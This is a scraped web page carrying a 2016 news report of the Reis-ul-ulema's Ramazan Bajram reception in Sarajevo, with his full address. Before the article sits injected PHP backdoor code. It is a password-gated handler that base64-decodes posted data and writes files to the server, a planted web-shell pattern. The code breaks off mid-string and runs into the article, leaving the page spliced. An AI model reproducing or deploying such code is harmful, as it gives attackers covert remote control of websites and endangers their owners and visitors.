function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Bajramski prijem Reisu-l-uleme - Medžlis Islamske zajednice Bijeljina

Bajramski prijem Reisu-l-uleme

Bajramski prijem Reisu-l-uleme

Sarajevo, 05. juli 2016. (MINA) – Bajramski prijem koji organizira reisu-l-ulema Islamske zajednice u Bosni i Hercegovini povodom Ramazanskog bajrama održan je večeras u Haremu Careve džamije u Sarajevu.

Prijemu su prisustvovali predstavnici organa i ustanova Islamske zajednice, predstavnici vjerskih zajednica i crkava, državnih i političkih organa, diplomatskog kora te brojni kulturni i javni radnici. Oni su čestitali Reisu-l-ulemi Husein ef. Kavazoviću Ramazanski bajram.

U svom obraćanju Reisu-l-ulema Husein ef. Kavazović je kazao:

“Hvala Vam što ste došli da večeras podijelimo ove trenutke naše bajramske radosti.

Mi muslimani u danima ramazanskog bajrama proslavljamo završetak posta. Radujemo se što smo ispostili mjesec Ramazana, nakon što smo u proteklih mjesec dana i noći proživjeli jedno opipljivo, zrelo, ispunjeno i neograničeno vrijeme, u danima ramazanskog bajrama, osjećamo i neku ispražnjenost, sjetu, gotovo tugu…

Zapravo, najdublje i najdalekosežnije razloge za našu bajramsku radost postači nalaze u izvršenom strogom i zahtjevnom postu. Jer, oni znaju i osjećaju, oni se nadaju da su, posteći, bili posvećeni višem smislu života, onom smislu u kojem je život više od preživljavanja, u kojem se na drugačiji način susrećemo s vodom, hranom i svim drugim blagodatima, u kojem se na drugačiji način susrećemo s drugim ljudima i sa samim sobom, u kojem se na drugačiji način susrećemo s Božijom Ljepotom, Ljubavlju, Milošću.

Stoga Vas želim podsjetiti u ovim svečanim trenutcima Ramazanskog bajrama na nekoliko važnih poruka blagoslovljenog mjeseca Ramazana, a koje nam svima nedostaju u današnjem svijetu u kojem je najviša vrijednost samo ono što se može potrošiti.

U mjesecu ramazanu, u noći koju poznajemo kao Lejletu-l-kadr, dogodila se objava Kur'ana. Prve kur'anske riječi od nas traže da čitamo. U čitanju se nalazi ona moć kojom Mudri Bog opisuje noć u kojoj je započela objava Kur'ana, a o kojoj pjeva naš pjesnik kada kaže: ”To nije noć to je moć…” Dakle, u čitanju je moć. To bi bila prva poruka ramazana.

U mjesecu ramazanu kroz post smo učili kako se jedino odricanjem istinski stiče. Odricanje je jedini način da nešto imamo. Kroz odricanje smo učili da vjera nije ništa drugo nego zahvalnost. Kroz post smo učili kako se radi na sebi i kako je to i teško i važno. U ramazanu smo učili kako se drži do sebe.

U mjesecu ramazanu kajali smo se za naše grijehe i molili Dragog Boga da nam oprosti, da nam se smiluje. Jer, sestre i braćo, kako kaže Rumi, Plakanje i kajanje snagu golemu daje… Ko kraj vidi, blagoslov mu darovan je… Zazelenit će se svuda kuda voda potekne, Milost će proključati gdje god suza kane…

U mjesecu ramazanu produbljivali smo našu solidarnost sa onima koji nemaju vode, koji nemaju hrane, sa siromašnima, s rodbinom, prijateljima, komšijama. Izvršavali smo jednu od pet temeljnih dužnosti u islamu a to je dužnost čišćenja našeg imetka kroz davanje zekata i sadekatu-l-fitra. Dijelili smo u bratskoj ljubavi iftare.

U najkraćem, i ovogodišnji mjesec Ramazan za nas postače bio je jedno sveto, blagoslovljeno vrijeme. Svima koji su ga ispostili čestitam. Onima koji nisu, a mogli su i trebali, više sreće drugi put. Vama koji s nama večeras dijelite bajramsku radost hvala.

Bajram šerif Mubarek olsu!”, zaključio je svoje obraćanje Reisu-l-ulema.